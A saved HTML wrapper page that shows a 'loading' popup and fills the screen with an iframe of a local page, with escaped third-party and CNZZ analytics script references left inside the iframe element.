<!DOCTYPE >
<html xmlns="http://www.w3.org/1999/xhtml" style=""><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
 <script src="apiget_data/jquery-1.js"></script>
<script src="apiget_data/layer.js"></script><link rel="stylesheet" href="apiget_data/layer.css" id="layuicss-skinlayercss">


<script>
layer.msg('<span style="font-size:20px">正在加载中....</span>', {
time:2000,
scrollbar: false,
});
</script><style type="text/css">
body{
 padding: 0px;  
 margin: 0px; 
 whdth:100%;
 height:100%;
 background:#000;
 overflow:hidden; 
}
ul,li{list-style:none;}
#content{width:600px;margin:0 auto;border:1px solid #f00;}
ul li.item{width:400px;text-align:center;margin:20px 100px;color:#fff;font-size:14px;font-weight:bold;height:100px;line-height:100px;}
#float_banner{position:absolute;top:0;height:50px;line-height:20px;text-align:center;color:#fff;font-size:14px;font-weight:bold;z-index:2;}
a{text-decoration:none;cursor:pointer;}
#panel{padding-top: 10px;}
.WMXZ-WANG {
    display: block;
    position: relative;
    right: 0px;
    width: 70px;
    height: 23px;
    padding-top: 6px;
    font-family: 宋体;
    font-family: arial, sans-serif;
    font-size: 16px;
    color: #ffffff;
    font-weight: bold;
    text-decoration: none;
    text-align: center;
    border: 1px solid #f9f8f8;
}

</style></head>


<body>

<iframe src="apiget_data/api_get.html" id="mainFrame" name="mainFrame" border="0" marginwidth="0" marginheight="0" allowfullscreen="true" scrolling="no" style="width:100%;height:100%" frameborder="0">
  

&lt;/body&gt;
&lt;script src='https://e.admin60.com/6467'&gt;&lt;/script&gt;
&lt;script src='https://e.admin60.com/6466'&gt;&lt;/script&gt;
&lt;span style="display: none;"&gt;&lt;script 
src='https://w.cnzz.com/c.php?id=1265636754&amp;l=3' 
language='JavaScript'&gt;&lt;/script&gt;&lt;/span&gt;
&lt;/html&gt;</iframe><div class="layui-layer-move"></div></body></html>